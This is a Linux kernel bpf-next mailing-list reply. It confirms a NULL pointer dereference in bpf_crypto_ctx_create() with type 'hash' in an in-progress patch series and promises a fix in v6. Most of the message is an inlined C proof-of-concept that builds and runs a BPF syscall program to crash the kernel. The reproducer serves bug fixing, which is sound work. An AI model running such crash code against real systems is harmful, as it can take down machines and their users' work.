Hi,

> Can this cause a NULL pointer dereference when a BPF program calls
> bpf_crypto_ctx_create() with type="hash"?
>
> The bpf_crypto_ctx_create() function in kernel/bpf/crypto.c
> unconditionally calls type->setkey(), type->ivsize(), and
> type->statesize():
>
>     *err = type->setkey(ctx->tfm, params->key, params->key_len);
>     ...
>     ctx->siv_len = type->ivsize(ctx->tfm) + type->statesize(ctx->tfm);
>
> But bpf_crypto_shash_type does not implement these callbacks, leaving
> them as NULL.
>
> Note: This appears to be fixed later in the series by commit
> 76d771a64b50 ("bpf: Add hash kfunc for cryptographic hashing") which
> adds NULL checks before calling these function pointers. Should this
> commit be squashed with 76d771a64b50 to ensure each patch in the
> series is bisectable without introducing crashes?

Yes, confirmed.

I reproduced this on x86_64 with a sleepable BPF syscall program that
calls bpf_crypto_ctx_create() with:
- type = "hash"
- algo = "sha256"
- key_len = 1

This reaches the path where type->setkey(), type->ivsize() and
type->statesize() are called without NULL checks for the hash type, and
triggers the NULL pointer dereference you pointed out.

Below is the reproducer (inlined, no attachment):

--8<--
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <linux/btf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

#define LOG_BUF_SIZE (1 << 20)

/*
 * Issue the bpf(2) system call directly through syscall(2) and hand back
 * its result unchanged (callers check for < 0 and then consult errno).
 */
static int bpf_sys(enum bpf_cmd cmd, union bpf_attr *attr, unsigned int size)
{
        long rc;

        rc = syscall(__NR_bpf, cmd, attr, size);
        return (int)rc;
}

static size_t btf_type_size(const struct btf_type *t)
{
        __u16 vlen = BTF_INFO_VLEN(t->info);
        __u32 kind = BTF_INFO_KIND(t->info);
        size_t sz = sizeof(*t);

        switch (kind) {
        case BTF_KIND_INT: sz += sizeof(__u32); break;
        case BTF_KIND_ARRAY: sz += sizeof(struct btf_array); break;
        case BTF_KIND_STRUCT:
        case BTF_KIND_UNION: sz += (size_t)vlen * sizeof(struct
        btf_member); break; case BTF_KIND_ENUM: sz += (size_t)vlen *
        sizeof(struct btf_enum); break; case BTF_KIND_FUNC_PROTO: sz +=
        (size_t)vlen * sizeof(struct btf_param); break; case
        BTF_KIND_VAR: sz += sizeof(struct btf_var); break; case
        BTF_KIND_DATASEC: sz += (size_t)vlen * sizeof(struct
        btf_var_secinfo); break; case BTF_KIND_DECL_TAG: sz +=
        sizeof(struct btf_decl_tag); break; case BTF_KIND_ENUM64: sz +=
        (size_t)vlen * sizeof(struct btf_enum64); break; default:
        break; } return sz;
}

static int find_vmlinux_func_btf_id(const char *func_name)
{
        int fd = -1, ret = -1;
        struct stat st;
        unsigned char *blob = NULL;
        struct btf_header *hdr;
        char *types, *strs;
        __u32 off, id;
        ssize_t n;
        size_t got = 0;

        fd = open("/sys/kernel/btf/vmlinux", O_RDONLY);
        if (fd < 0) goto out;
        if (fstat(fd, &st) < 0 || st.st_size <= 0) goto out;

        blob = malloc(st.st_size);
        if (!blob) goto out;

        while (got < (size_t)st.st_size) {
                n = read(fd, blob + got, (size_t)st.st_size - got);
                if (n < 0) {
                        if (errno == EINTR) continue;
                        goto out;
                }
                if (n == 0) break;
                got += (size_t)n;
        }
        if (got < sizeof(*hdr)) goto out;

        hdr = (struct btf_header *)blob;
        if (hdr->magic != BTF_MAGIC || hdr->version != BTF_VERSION)
        goto out; if ((size_t)hdr->hdr_len + hdr->type_off +
        hdr->type_len > got) goto out; if ((size_t)hdr->hdr_len +
        hdr->str_off + hdr->str_len > got) goto out;

        types = (char *)blob + hdr->hdr_len + hdr->type_off;
        strs = (char *)blob + hdr->hdr_len + hdr->str_off;

        for (off = 0, id = 1; off < hdr->type_len; id++) {
                struct btf_type *t = (struct btf_type *)(types + off);
                const char *name = t->name_off ? (strs + t->name_off) :
        ""; size_t sz = btf_type_size(t);

                if (sz == 0 || off + sz > hdr->type_len) goto out;
                if (BTF_INFO_KIND(t->info) == BTF_KIND_FUNC &&
                strcmp(name, func_name) == 0) { ret = (int)id;
                        goto out;
                }
                off += sz;
        }

out:
        free(blob);
        if (fd >= 0) close(fd);
        return ret;
}

/*
 * Stack layout of the PoC BPF program (offsets are relative to r10/fp):
 *   [fp - PARAMS_BASE, fp - ERR_BASE)  params block, PARAMS_SIZE bytes
 *   [fp - ERR_BASE, ...)               int err filled in by the kfunc
 * PARAMS_*_OFF are byte offsets inside the params block.
 * NOTE(review): they assume struct bpf_crypto_params places type at 0,
 * algo at 16, key at 144 and key_len at 400. Confirm against the tree
 * under test.
 */
enum {
        PARAMS_BASE = 424,
        ERR_BASE = 16,
        PARAMS_SIZE = 408,
        PARAMS_TYPE_OFF = 0,
        PARAMS_ALGO_OFF = 16,
        PARAMS_KEY_OFF = 144,
        PARAMS_KEY_LEN_OFF = 400,
};

/*
 * Fill @insn (room for @cap instructions) with the PoC program. The program:
 *   - zeroes the stack,
 *   - builds a params block with type "hash", algo "sha256", key_len 1,
 *   - calls bpf_crypto_ctx_create() (BTF id @create_id),
 *   - passes a non-NULL result to bpf_crypto_ctx_release() (@release_id),
 *   - returns 0.
 * Returns the number of instructions written, or -1 if @cap is too small.
 */
static int build_poc_prog(struct bpf_insn *insn, size_t cap,
                          int create_id, int release_id)
{
        size_t pc = 0;
        int off;

#define EMIT(...)                                                       \
        do {                                                            \
                if (pc >= cap)                                          \
                        return -1;                                      \
                insn[pc++] = (struct bpf_insn){ __VA_ARGS__ };          \
        } while (0)

        /* Zero fp-8 .. fp-PARAMS_BASE so every stack slot is initialized. */
        for (off = -8; off >= -PARAMS_BASE; off -= 8)
                EMIT(.code = BPF_ST | BPF_MEM | BPF_DW, .dst_reg = BPF_REG_10,
                     .off = off, .imm = 0);

        /*
         * String immediates below assume a little-endian host: 0x68736168 is
         * stored as the bytes "hash", 0x32616873 as "sha2", 0x3635 as "56".
         */
        EMIT(.code = BPF_ST | BPF_MEM | BPF_W, .dst_reg = BPF_REG_10,
             .off = -PARAMS_BASE + PARAMS_TYPE_OFF, .imm = 0x68736168);
        EMIT(.code = BPF_ST | BPF_MEM | BPF_W, .dst_reg = BPF_REG_10,
             .off = -PARAMS_BASE + PARAMS_ALGO_OFF, .imm = 0x32616873);
        EMIT(.code = BPF_ST | BPF_MEM | BPF_W, .dst_reg = BPF_REG_10,
             .off = -PARAMS_BASE + PARAMS_ALGO_OFF + 4, .imm = 0x00003635);
        /* One-byte key (0x11) with key_len = 1. */
        EMIT(.code = BPF_ST | BPF_MEM | BPF_B, .dst_reg = BPF_REG_10,
             .off = -PARAMS_BASE + PARAMS_KEY_OFF, .imm = 0x11);
        EMIT(.code = BPF_ST | BPF_MEM | BPF_W, .dst_reg = BPF_REG_10,
             .off = -PARAMS_BASE + PARAMS_KEY_LEN_OFF, .imm = 1);

        /* r1 = fp - PARAMS_BASE, r2 = PARAMS_SIZE, r3 = fp - ERR_BASE */
        EMIT(.code = BPF_ALU64 | BPF_MOV | BPF_X, .dst_reg = BPF_REG_1,
             .src_reg = BPF_REG_10);
        EMIT(.code = BPF_ALU64 | BPF_ADD | BPF_K, .dst_reg = BPF_REG_1,
             .imm = -PARAMS_BASE);
        EMIT(.code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_2,
             .imm = PARAMS_SIZE);
        EMIT(.code = BPF_ALU64 | BPF_MOV | BPF_X, .dst_reg = BPF_REG_3,
             .src_reg = BPF_REG_10);
        EMIT(.code = BPF_ALU64 | BPF_ADD | BPF_K, .dst_reg = BPF_REG_3,
             .imm = -ERR_BASE);

        /* r0 = bpf_crypto_ctx_create(r1, r2, r3) */
        EMIT(.code = BPF_JMP | BPF_CALL, .src_reg = BPF_PSEUDO_KFUNC_CALL,
             .imm = create_id);

        /* if (r0 != 0) bpf_crypto_ctx_release(r0); the JEQ skips 2 insns. */
        EMIT(.code = BPF_JMP | BPF_JEQ | BPF_K, .dst_reg = BPF_REG_0,
             .off = 2, .imm = 0);
        EMIT(.code = BPF_ALU64 | BPF_MOV | BPF_X, .dst_reg = BPF_REG_1,
             .src_reg = BPF_REG_0);
        EMIT(.code = BPF_JMP | BPF_CALL, .src_reg = BPF_PSEUDO_KFUNC_CALL,
             .imm = release_id);

        /* return 0 */
        EMIT(.code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0,
             .imm = 0);
        EMIT(.code = BPF_JMP | BPF_EXIT);

#undef EMIT
        return (int)pc;
}

/*
 * Load the PoC as a sleepable BPF_PROG_TYPE_SYSCALL program and run it once
 * through BPF_PROG_TEST_RUN.
 *
 * Exit status:
 *   0  the test run completed,
 *   1  BTF ids could not be resolved or the program could not be built,
 *   2  BPF_PROG_LOAD failed (the verifier log is printed),
 *   3  BPF_PROG_TEST_RUN failed.
 */
int main(void)
{
        /* Static: a 1 MiB buffer is too large to place on the stack. */
        static char logbuf[LOG_BUF_SIZE];
        struct bpf_insn insn[128];
        char lic[] = "GPL";
        union bpf_attr attr;
        union bpf_attr run;
        int create_id, release_id, insn_cnt, prog_fd, err;

        create_id = find_vmlinux_func_btf_id("bpf_crypto_ctx_create");
        release_id = find_vmlinux_func_btf_id("bpf_crypto_ctx_release");
        if (create_id <= 0 || release_id <= 0) {
                fprintf(stderr,
                        "failed resolving BTF IDs: create=%d release=%d\n",
                        create_id, release_id);
                return 1;
        }

        insn_cnt = build_poc_prog(insn, sizeof(insn) / sizeof(insn[0]),
                                  create_id, release_id);
        if (insn_cnt < 0) {
                fprintf(stderr, "instruction buffer too small\n");
                return 1;
        }

        memset(&attr, 0, sizeof(attr));
        attr.prog_type = BPF_PROG_TYPE_SYSCALL;
        attr.prog_flags = BPF_F_SLEEPABLE;
        attr.insn_cnt = (__u32)insn_cnt;
        attr.insns = (uint64_t)(uintptr_t)insn;
        attr.license = (uint64_t)(uintptr_t)lic;
        attr.log_level = 1;
        attr.log_size = sizeof(logbuf);
        attr.log_buf = (uint64_t)(uintptr_t)logbuf;
        memcpy(attr.prog_name, "poc_hash_bug", 12);

        prog_fd = bpf_sys(BPF_PROG_LOAD, &attr, sizeof(attr));
        if (prog_fd < 0) {
                err = errno;    /* save before fprintf can clobber it */
                fprintf(stderr, "BPF_PROG_LOAD failed: errno=%d (%s)\n",
                        err, strerror(err));
                fprintf(stderr, "Verifier log:\n%s\n", logbuf);
                return 2;
        }

        memset(&run, 0, sizeof(run));
        run.test.prog_fd = prog_fd;
        /* If the kernel survives the run, report the outcome. */
        if (bpf_sys(BPF_PROG_TEST_RUN, &run, sizeof(run)) < 0) {
                err = errno;
                fprintf(stderr, "BPF_PROG_TEST_RUN failed: errno=%d (%s)\n",
                        err, strerror(err));
                close(prog_fd);
                return 3;
        }
        printf("BPF_PROG_TEST_RUN completed: retval=%u\n", run.test.retval);
        close(prog_fd);
        return 0;
}
--8<--

I agree this should be fixed at patch granularity. I will squash the
NULL-check fix into patch 2 in v6 so that each patch remains bisectable
and no patch introduces a crash window.

Since this issue has already been discussed publicly on bpf-next and was
raised by the CI review, replying on-list is appropriate.

Signed-off-by: XIAO WU <[email protected]>

Thanks

Reply via email to